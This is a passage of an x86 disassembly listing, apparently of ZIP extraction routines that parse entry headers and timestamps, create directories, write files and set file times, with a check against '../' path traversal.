jnz loc_4301AB
mov edx, [ebp+var_1E8]
mov eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [eax+4]
mov [ecx], edx
mov eax, [ebp+arg_4]
mov byte ptr [eax+4], 0
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+108h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+10Ch], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+110h], 0
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+114h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+118h], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+11Ch], 0
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+120h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+124h], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+128h], 0
xor eax, eax
jmp loc_430701
; ---------------------------------------------------------------------------
loc_4301AB: ; CODE XREF: sub_43007C+96�j
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+10h]
jge short loc_4301CC
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_42F313
add esp, 4
loc_4301CC: ; CODE XREF: sub_43007C+13D�j
; sub_43007C+171�j
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ecx+10h]
cmp edx, [ebp+arg_0]
jge short loc_4301EF
mov eax, [ebp+var_1E8]
mov ecx, [eax]
push ecx
call sub_42F381
add esp, 4
jmp short loc_4301CC
; ---------------------------------------------------------------------------
loc_4301EF: ; CODE XREF: sub_43007C+15E�j
push 0
push 0
push 0
push 0
push 104h
lea edx, [ebp+var_190]
push edx
lea eax, [ebp+var_58]
push eax
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_42F2E4
add esp, 20h
lea eax, [ebp+var_64]
push eax
lea ecx, [ebp+var_78]
push ecx
lea edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_1E8]
mov ecx, [eax]
push ecx
call sub_42F55B
add esp, 10h
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_43024B
mov eax, 700h
jmp loc_430701
; ---------------------------------------------------------------------------
loc_43024B: ; CODE XREF: sub_43007C+1C3�j
push 0
mov edx, [ebp+var_78]
push edx
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ecx]
push edx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_430272
mov eax, 800h
jmp loc_430701
; ---------------------------------------------------------------------------
loc_430272: ; CODE XREF: sub_43007C+1EA�j
mov eax, [ebp+var_64]
push eax
call sub_431624
add esp, 4
mov [ebp+var_1C4], eax
mov ecx, [ebp+var_1C4]
mov [ebp+var_70], ecx
mov edx, [ebp+var_1E8]
mov eax, [edx]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_64]
push edx
push 1
mov eax, [ebp+var_70]
push eax
call sub_42E740
add esp, 10h
cmp eax, [ebp+var_64]
jz short loc_4302D1
mov ecx, [ebp+var_70]
mov [ebp+var_1C8], ecx
mov edx, [ebp+var_1C8]
push edx
call sub_43161E
add esp, 4
mov eax, 800h
jmp loc_430701
; ---------------------------------------------------------------------------
loc_4302D1: ; CODE XREF: sub_43007C+231�j
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [ecx+10h]
mov [edx], eax
lea ecx, [ebp+var_190]
push ecx
mov edx, [ebp+arg_4]
add edx, 4
push edx
call sub_431758 ; strcpy
add esp, 8
mov eax, [ebp+var_24]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 40000000h
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_88], cl
mov edx, [ebp+var_8]
and edx, 800000h
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_19C], dl
mov eax, [ebp+var_8]
and eax, 1
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_198], al
mov ecx, [ebp+var_8]
and ecx, 2
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_6C], cl
mov edx, [ebp+var_8]
and edx, 4
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_84], dl
mov eax, [ebp+var_8]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_194], al
mov ecx, [ebp+var_8]
and ecx, 20h
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_4], cl
mov edx, [ebp+arg_4]
mov dword ptr [edx+108h], 80h
mov eax, [ebp+var_88]
and eax, 0FFh
test eax, eax
jnz short loc_4303A7
mov ecx, [ebp+var_194]
and ecx, 0FFh
test ecx, ecx
jz short loc_4303BB
loc_4303A7: ; CODE XREF: sub_43007C+319�j
mov edx, [ebp+arg_4]
mov eax, [edx+108h]
or al, 10h
mov ecx, [ebp+arg_4]
mov [ecx+108h], eax
loc_4303BB: ; CODE XREF: sub_43007C+329�j
mov edx, [ebp+var_4]
and edx, 0FFh
test edx, edx
jz short loc_4303DD
mov eax, [ebp+arg_4]
mov ecx, [eax+108h]
or ecx, 20h
mov edx, [ebp+arg_4]
mov [edx+108h], ecx
loc_4303DD: ; CODE XREF: sub_43007C+34A�j
mov eax, [ebp+var_6C]
and eax, 0FFh
test eax, eax
jz short loc_4303FE
mov ecx, [ebp+arg_4]
mov edx, [ecx+108h]
or edx, 2
mov eax, [ebp+arg_4]
mov [eax+108h], edx
loc_4303FE: ; CODE XREF: sub_43007C+36B�j
mov ecx, [ebp+var_19C]
and ecx, 0FFh
test ecx, ecx
jz short loc_43041E
mov edx, [ebp+var_198]
and edx, 0FFh
test edx, edx
jz short loc_430433
loc_43041E: ; CODE XREF: sub_43007C+390�j
mov eax, [ebp+arg_4]
mov ecx, [eax+108h]
or ecx, 1
mov edx, [ebp+arg_4]
mov [edx+108h], ecx
loc_430433: ; CODE XREF: sub_43007C+3A0�j
mov eax, [ebp+var_84]
and eax, 0FFh
test eax, eax
jz short loc_430457
mov ecx, [ebp+arg_4]
mov edx, [ecx+108h]
or edx, 4
mov eax, [ebp+arg_4]
mov [eax+108h], edx
loc_430457: ; CODE XREF: sub_43007C+3C4�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_40]
mov [ecx+124h], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_3C]
mov [eax+128h], ecx
mov edx, [ebp+var_48]
and edx, 0FFFFh
mov [ebp+var_80], dx
mov eax, [ebp+var_48]
shr eax, 10h
and eax, 0FFFFh
mov [ebp+var_68], ax
lea ecx, [ebp+var_60]
push ecx
mov dx, [ebp+var_80]
push edx
mov ax, [ebp+var_68]
push eax
call dword_433094 ; DosDateTimeToFileTime
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+10Ch], edx
mov eax, [ebp+var_5C]
mov [ecx+110h], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+114h], edx
mov eax, [ebp+var_5C]
mov [ecx+118h], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+11Ch], edx
mov eax, [ebp+var_5C]
mov [ecx+120h], eax
mov [ebp+var_7C], 0
loc_4304E5: ; CODE XREF: sub_43007C+4D4�j
mov ecx, [ebp+var_7C]
add ecx, 4
cmp ecx, [ebp+var_64]
jnb loc_4306B7
mov edx, [ebp+var_70]
add edx, [ebp+var_7C]
mov al, [edx]
mov [ebp+var_1B4], al
mov ecx, [ebp+var_70]
add ecx, [ebp+var_7C]
mov dl, [ecx+1]
mov [ebp+var_1B3], dl
mov [ebp+var_1B2], 0
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
movsx ecx, byte ptr [eax+2]
mov [ebp+var_1A4], ecx
push offset aUt ; "UT"
lea edx, [ebp+var_1B4]
push edx
call sub_4317B4 ; strcmp
add esp, 8
test eax, eax
jz short loc_430552
mov eax, [ebp+var_1A4]
mov ecx, [ebp+var_7C]
lea edx, [ecx+eax+4]
mov [ebp+var_7C], edx
jmp short loc_4304E5
; ---------------------------------------------------------------------------
loc_430552: ; CODE XREF: sub_43007C+4C2�j
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
movsx ecx, byte ptr [eax+4]
mov [ebp+var_1A0], ecx
mov edx, [ebp+var_1A0]
and edx, 1
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_1A8], dl
mov eax, [ebp+var_1A0]
and eax, 2
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_1B0], al
mov ecx, [ebp+var_1A0]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_1AC], cl
mov edx, [ebp+var_7C]
add edx, 5
mov [ebp+var_7C], edx
mov eax, [ebp+var_1A8]
and eax, 0FFh
test eax, eax
jz short loc_430606
mov ecx, [ebp+var_70]
add ecx, [ebp+var_7C]
mov edx, [ecx]
mov [ebp+var_1B8], edx
mov eax, [ebp+var_7C]
add eax, 4
mov [ebp+var_7C], eax
mov ecx, [ebp+var_1B8]
push ecx
call sub_42FF52
add esp, 4
mov [ebp+var_1D0], eax
mov [ebp+var_1CC], edx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1D0]
mov [edx+11Ch], eax
mov ecx, [ebp+var_1CC]
mov [edx+120h], ecx
loc_430606: ; CODE XREF: sub_43007C+53B�j
mov edx, [ebp+var_1B0]
and edx, 0FFh
test edx, edx
jz short loc_430663
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
mov ecx, [eax]
mov [ebp+var_1BC], ecx
mov edx, [ebp+var_7C]
add edx, 4
mov [ebp+var_7C], edx
mov eax, [ebp+var_1BC]
push eax
call sub_42FF52
add esp, 4
mov [ebp+var_1D8], eax
mov [ebp+var_1D4], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1D8]
mov [ecx+10Ch], edx
mov eax, [ebp+var_1D4]
mov [ecx+110h], eax
loc_430663: ; CODE XREF: sub_43007C+598�j
mov ecx, [ebp+var_1AC]
and ecx, 0FFh
test ecx, ecx
jz short loc_4306B7
mov edx, [ebp+var_70]
add edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_1C0], eax
mov ecx, [ebp+var_1C0]
push ecx
call sub_42FF52
add esp, 4
mov [ebp+var_1E0], eax
mov [ebp+var_1DC], edx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1E0]
mov [edx+114h], eax
mov ecx, [ebp+var_1DC]
mov [edx+118h], ecx
loc_4306B7: ; CODE XREF: sub_43007C+472�j
; sub_43007C+5F5�j
cmp [ebp+var_70], 0
jz short loc_4306D5
mov edx, [ebp+var_70]
mov [ebp+var_1E4], edx
mov eax, [ebp+var_1E4]
push eax
call sub_43161E
add esp, 4
loc_4306D5: ; CODE XREF: sub_43007C+63F�j
push 12Ch
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_1E8]
add edx, 8
push edx
call sub_431764 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1E8]
mov ecx, [ebp+arg_0]
mov [eax+134h], ecx
xor eax, eax
loc_430701: ; CODE XREF: sub_43007C+2A�j
; sub_43007C+8D�j ...
mov esp, ebp
pop ebp
retn 8
sub_43007C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430707 proc near ; CODE XREF: HLXc:0043139C�p
; HLXc:0043141C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+arg_4]
and eax, 0FFh
neg eax
sbb eax, eax
neg eax
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
call sub_42F43A
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_430775
cmp [ebp+arg_8], 0
jz short loc_43074C
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0FFFFFFFFh
loc_43074C: ; CODE XREF: sub_430707+3A�j
cmp [ebp+arg_C], 0
jz short loc_43076E
push 12Ch
push 0
mov edx, [ebp+arg_C]
push edx
call sub_431752 ; memset
add esp, 0Ch
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0FFFFFFFFh
loc_43076E: ; CODE XREF: sub_430707+49�j
mov eax, 500h
jmp short loc_4307D5
; ---------------------------------------------------------------------------
loc_430775: ; CODE XREF: sub_430707+34�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jz short loc_43078C
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
call sub_42FDD7
add esp, 4
loc_43078C: ; CODE XREF: sub_430707+75�j
mov ecx, [ebp+var_10]
mov dword ptr [ecx+4], 0FFFFFFFFh
mov edx, [ebp+var_10]
mov eax, [edx]
mov ecx, [eax+10h]
mov [ebp+var_8], ecx
cmp [ebp+arg_8], 0
jz short loc_4307AF
mov edx, [ebp+arg_8]
mov eax, [ebp+var_8]
mov [edx], eax
loc_4307AF: ; CODE XREF: sub_430707+9E�j
cmp [ebp+arg_C], 0
jz short loc_4307D3
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+var_8]
push edx
mov ecx, [ebp+var_10]
call sub_43007C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4307D3
mov eax, [ebp+var_C]
jmp short loc_4307D5
; ---------------------------------------------------------------------------
loc_4307D3: ; CODE XREF: sub_430707+AC�j
; sub_430707+C5�j
xor eax, eax
loc_4307D5: ; CODE XREF: sub_430707+6C�j
; sub_430707+CA�j
mov esp, ebp
pop ebp
retn 10h
sub_430707 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4307DB proc near ; CODE XREF: sub_4307DB+B4�p
; sub_4308E2+227�p ...
var_214 = byte ptr -214h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 214h
cmp [ebp+arg_4], 0
jz short loc_4307F4
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_4307F9
loc_4307F4: ; CODE XREF: sub_4307DB+D�j
jmp loc_4308DE
; ---------------------------------------------------------------------------
loc_4307F9: ; CODE XREF: sub_4307DB+17�j
mov edx, [ebp+arg_4]
mov [ebp+var_10C], edx
mov eax, [ebp+var_10C]
mov [ebp+var_4], eax
loc_43080B: ; CODE XREF: sub_4307DB+62�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_43083F
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Fh
jz short loc_43082B
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_430834
loc_43082B: ; CODE XREF: sub_4307DB+43�j
mov ecx, [ebp+var_4]
mov [ebp+var_10C], ecx
loc_430834: ; CODE XREF: sub_4307DB+4E�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_43080B
; ---------------------------------------------------------------------------
loc_43083F: ; CODE XREF: sub_4307DB+38�j
mov eax, [ebp+var_10C]
mov [ebp+var_110], eax
mov ecx, [ebp+var_10C]
cmp ecx, [ebp+arg_4]
jz short loc_4308A6
mov edx, [ebp+var_10C]
sub edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_214]
push ecx
call sub_422680
add esp, 0Ch
mov edx, [ebp+var_10C]
sub edx, [ebp+arg_4]
mov [ebp+edx+var_214], 0
lea eax, [ebp+var_214]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4307DB
add esp, 8
mov edx, [ebp+var_110]
add edx, 1
mov [ebp+var_110], edx
loc_4308A6: ; CODE XREF: sub_4307DB+79�j
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_108]
push ecx
call sub_431758 ; strcpy
add esp, 8
mov edx, [ebp+var_110]
push edx
lea eax, [ebp+var_108]
push eax
call sub_431770 ; strcat
add esp, 8
push 0
lea ecx, [ebp+var_108]
push ecx
call dword_433030 ; CreateDirectoryA
loc_4308DE: ; CODE XREF: sub_4307DB:loc_4307F4�j
mov esp, ebp
pop ebp
retn
sub_4307DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4308E2 proc near ; CODE XREF: sub_4314C0+58�p
var_4264 = dword ptr -4264h
var_4260 = dword ptr -4260h
var_425C = dword ptr -425Ch
var_4258 = byte ptr -4258h
var_4251 = byte ptr -4251h
var_4250 = byte ptr -4250h
var_424F = byte ptr -424Fh
var_414C = dword ptr -414Ch
var_4148 = dword ptr -4148h
var_4144 = dword ptr -4144h
var_4140 = dword ptr -4140h
var_413C = dword ptr -413Ch
var_4138 = dword ptr -4138h
var_4134 = dword ptr -4134h
var_4130 = dword ptr -4130h
var_412C = byte ptr -412Ch
var_4128 = byte ptr -4128h
var_4024 = dword ptr -4024h
var_4020 = byte ptr -4020h
var_4018 = byte ptr -4018h
var_4010 = byte ptr -4010h
var_4000 = byte ptr -4000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 4264h
call sub_431700
push ebx
push esi
mov [ebp+var_4260], ecx
cmp [ebp+arg_C], 3
jz short loc_430913
cmp [ebp+arg_C], 2
jz short loc_430913
cmp [ebp+arg_C], 1
jz short loc_430913
mov eax, 10000h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430913: ; CODE XREF: sub_4308E2+19�j
; sub_4308E2+1F�j ...
cmp [ebp+arg_C], 3
jnz loc_430A3E
mov eax, [ebp+var_4260]
mov ecx, [ebp+arg_0]
cmp ecx, [eax+4]
jz loc_4309D4
mov edx, [ebp+var_4260]
cmp dword ptr [edx+4], 0FFFFFFFFh
jz short loc_43094C
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42FDD7
add esp, 4
loc_43094C: ; CODE XREF: sub_4308E2+57�j
mov edx, [ebp+var_4260]
mov dword ptr [edx+4], 0FFFFFFFFh
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+4]
jl short loc_430973
mov eax, 10000h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430973: ; CODE XREF: sub_4308E2+85�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+10h]
jge short loc_430994
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42F313
add esp, 4
loc_430994: ; CODE XREF: sub_4308E2+9F�j
; sub_4308E2+D3�j
mov edx, [ebp+var_4260]
mov eax, [edx]
mov ecx, [eax+10h]
cmp ecx, [ebp+arg_0]
jge short loc_4309B7
mov edx, [ebp+var_4260]
mov eax, [edx]
push eax
call sub_42F381
add esp, 4
jmp short loc_430994
; ---------------------------------------------------------------------------
loc_4309B7: ; CODE XREF: sub_4308E2+C0�j
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_42F7E0
add esp, 4
mov eax, [ebp+var_4260]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
loc_4309D4: ; CODE XREF: sub_4308E2+47�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_42F9A2
add esp, 0Ch
mov [ebp+var_4140], eax
cmp [ebp+var_4140], 0
jle short loc_430A06
mov eax, 600h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430A06: ; CODE XREF: sub_4308E2+118�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42FDD7
add esp, 4
mov edx, [ebp+var_4260]
mov dword ptr [edx+4], 0FFFFFFFFh
cmp [ebp+var_4140], 0
jnz short loc_430A34
xor eax, eax
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430A34: ; CODE XREF: sub_4308E2+149�j
mov eax, 5000000h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430A3E: ; CODE XREF: sub_4308E2+35�j
mov eax, [ebp+var_4260]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_430A5B
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_42FDD7
add esp, 4
loc_430A5B: ; CODE XREF: sub_4308E2+166�j
mov eax, [ebp+var_4260]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_4260]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+4]
jl short loc_430A82
mov eax, 10000h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430A82: ; CODE XREF: sub_4308E2+194�j
mov ecx, [ebp+var_4260]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+10h]
jge short loc_430AA3
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_42F313
add esp, 4
loc_430AA3: ; CODE XREF: sub_4308E2+1AE�j
; sub_4308E2+1E2�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ecx+10h]
cmp edx, [ebp+arg_0]
jge short loc_430AC6
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42F381
add esp, 4
jmp short loc_430AA3
; ---------------------------------------------------------------------------
loc_430AC6: ; CODE XREF: sub_4308E2+1CF�j
lea edx, [ebp+var_412C]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4260]
call sub_43007C
mov ecx, [ebp+var_4024]
and ecx, 10h
test ecx, ecx
jz short loc_430B18
cmp [ebp+arg_C], 1
jnz short loc_430AF6
xor eax, eax
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430AF6: ; CODE XREF: sub_4308E2+20B�j
lea edx, [ebp+var_4128]
push edx
mov eax, [ebp+var_4260]
add eax, 138h
push eax
call sub_4307DB
add esp, 8
xor eax, eax
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430B18: ; CODE XREF: sub_4308E2+205�j
cmp [ebp+arg_C], 1
jnz short loc_430B2C
mov ecx, [ebp+arg_4]
mov [ebp+var_4134], ecx
jmp loc_430C9E
; ---------------------------------------------------------------------------
loc_430B2C: ; CODE XREF: sub_4308E2+23A�j
mov edx, [ebp+arg_4]
mov [ebp+var_4148], edx
mov eax, [ebp+var_4148]
mov [ebp+var_4144], eax
loc_430B41: ; CODE XREF: sub_4308E2+2A6�j
mov ecx, [ebp+var_4144]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_430B8A
mov eax, [ebp+var_4144]
movsx ecx, byte ptr [eax]
cmp ecx, 2Fh
jz short loc_430B6A
mov edx, [ebp+var_4144]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_430B79
loc_430B6A: ; CODE XREF: sub_4308E2+278�j
mov ecx, [ebp+var_4144]
add ecx, 1
mov [ebp+var_4148], ecx
loc_430B79: ; CODE XREF: sub_4308E2+286�j
mov edx, [ebp+var_4144]
add edx, 1
mov [ebp+var_4144], edx
jmp short loc_430B41
; ---------------------------------------------------------------------------
loc_430B8A: ; CODE XREF: sub_4308E2+26A�j
mov eax, [ebp+var_4148]
cmp eax, [ebp+arg_4]
jz loc_430C7A
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_4250]
push edx
call sub_431758 ; strcpy
add esp, 8
mov eax, [ebp+var_4148]
sub eax, [ebp+arg_4]
mov [ebp+eax+var_4251], 0
movsx ecx, [ebp+var_4250]
cmp ecx, 2Fh
jz short loc_430BED
movsx edx, [ebp+var_4250]
cmp edx, 5Ch
jz short loc_430BED
movsx eax, [ebp+var_424F]
cmp eax, 3Ah
jz short loc_430BED
mov [ebp+var_4264], 0
jmp short loc_430BF7
; ---------------------------------------------------------------------------
loc_430BED: ; CODE XREF: sub_4308E2+2E5�j
; sub_4308E2+2F1�j ...
mov [ebp+var_4264], 1
loc_430BF7: ; CODE XREF: sub_4308E2+309�j
mov cl, byte ptr [ebp+var_4264]
mov byte ptr [ebp+var_414C], cl
mov ebx, [ebp+var_414C]
and ebx, 0FFh
push offset a__ ; "../"
lea edx, [ebp+var_4250]
push edx
call sub_4315D0
add esp, 8
mov esi, eax
neg esi
sbb esi, esi
neg esi
push offset a___0 ; "..\\"
lea eax, [ebp+var_4250]
push eax
call sub_4315D0
add esp, 8
neg eax
sbb eax, eax
neg eax
or esi, eax
or ebx, esi
mov byte ptr [ebp+var_414C], bl
mov ecx, [ebp+var_414C]
and ecx, 0FFh
test ecx, ecx
jnz short loc_430C7A
lea edx, [ebp+var_4250]
push edx
mov eax, [ebp+var_4260]
add eax, 138h
push eax
call sub_4307DB
add esp, 8
loc_430C7A: ; CODE XREF: sub_4308E2+2B1�j
; sub_4308E2+37B�j
push 0
mov ecx, [ebp+var_4024]
push ecx
push 2
push 0
push 0
push 40000000h
mov edx, [ebp+arg_4]
push edx
call dword_433018 ; CreateFileA
mov [ebp+var_4134], eax
loc_430C9E: ; CODE XREF: sub_4308E2+245�j
cmp [ebp+var_4134], 0FFFFFFFFh
jnz short loc_430CB1
mov eax, 200h
jmp loc_430DF0
; ---------------------------------------------------------------------------
loc_430CB1: ; CODE XREF: sub_4308E2+3C3�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42F7E0
add esp, 4
mov byte ptr [ebp+var_4138], 0
loc_430CC9: ; CODE XREF: sub_4308E2:loc_430D45�j
push 4000h
lea edx, [ebp+var_4000]
push edx
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_42F9A2
add esp, 0Ch
mov [ebp-4254h], eax
cmp dword ptr [ebp-4254h], 0
jge short loc_430CFE
mov byte ptr [ebp+var_4138], 1
jmp short loc_430D47
; ---------------------------------------------------------------------------
loc_430CFE: ; CODE XREF: sub_4308E2+411�j
cmp dword ptr [ebp-4254h], 0
jnz short loc_430D09
jmp short loc_430D47
; ---------------------------------------------------------------------------
loc_430D09: ; CODE XREF: sub_4308E2+423�j
push 0
lea edx, [ebp+var_4258]
push edx
mov eax, [ebp-4254h]
push eax
lea ecx, [ebp+var_4000]
push ecx
mov edx, [ebp+var_4134]
push edx
call dword_433050 ; WriteFile
mov [ebp+var_425C], eax
cmp [ebp+var_425C], 0
jnz short loc_430D45
mov byte ptr [ebp+var_4138], 1
jmp short loc_430D47
; ---------------------------------------------------------------------------
loc_430D45: ; CODE XREF: sub_4308E2+458�j
jmp short loc_430CC9
; ---------------------------------------------------------------------------
loc_430D47: ; CODE XREF: sub_4308E2+41A�j
; sub_4308E2+425�j ...
mov byte ptr [ebp+var_413C], 0
mov eax, [ebp+var_4134]
push eax
call dword_4330A4 ; GetFileType
mov [ebp+var_4130], eax
cmp [ebp+var_4130], 1
jnz short loc_430D81
mov ecx, [ebp+var_4138]
and ecx, 0FFh
test ecx, ecx
jnz short loc_430D81
mov byte ptr [ebp+var_413C], 1
loc_430D81: ; CODE XREF: sub_4308E2+486�j
; sub_4308E2+496�j
mov edx, [ebp+var_413C]
and edx, 0FFh
test edx, edx
jz short loc_430DB3
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_4020]
push ecx
lea edx, [ebp+var_4018]
push edx
mov eax, [ebp+var_4134]
push eax
call dword_433090 ; SetFileTime
loc_430DB3: ; CODE XREF: sub_4308E2+4AD�j
cmp [ebp+arg_C], 1
jz short loc_430DC6
mov ecx, [ebp+var_4134]
push ecx
call dword_433020 ; CloseHandle
loc_430DC6: ; CODE XREF: sub_4308E2+4D5�j
mov edx, [ebp+var_4260]
mov eax, [edx]
push eax
call sub_42FDD7
add esp, 4
mov ecx, [ebp+var_4138]
and ecx, 0FFh
test ecx, ecx
jz short loc_430DEE
mov eax, 400h
jmp short loc_430DF0
; ---------------------------------------------------------------------------
loc_430DEE: ; CODE XREF: sub_4308E2+503�j
xor eax, eax
loc_430DF0: ; CODE XREF: sub_4308E2+2C�j
; sub_4308E2+8C�j ...
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4308E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430DF8 proc near ; CODE XREF: sub_43152B+48�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_430E16
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call sub_42FDD7
add esp, 4
loc_430E16: ; CODE XREF: sub_430DF8+E�j
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_4]
cmp dword ptr [ecx], 0
jz short loc_430E36
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
call sub_42EDD8
add esp, 4
loc_430E36: ; CODE XREF: sub_430DF8+2E�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
xor eax, eax
mov esp, ebp
pop ebp
retn
sub_430DF8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
cmp dword ptr [ebp+8], 1
jnz short loc_430E59
mov eax, ds:dword_43BD34
mov [ebp+8], eax
loc_430E59: ; CODE XREF: HLXc:00430E4F�j
mov dword ptr [ebp-8], offset aUnknownZipResu ; "unknown zip result code"
mov ecx, [ebp+8]
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 20000h
ja loc_430F2E
cmp dword ptr [ebp-10h], 20000h
jz loc_431054
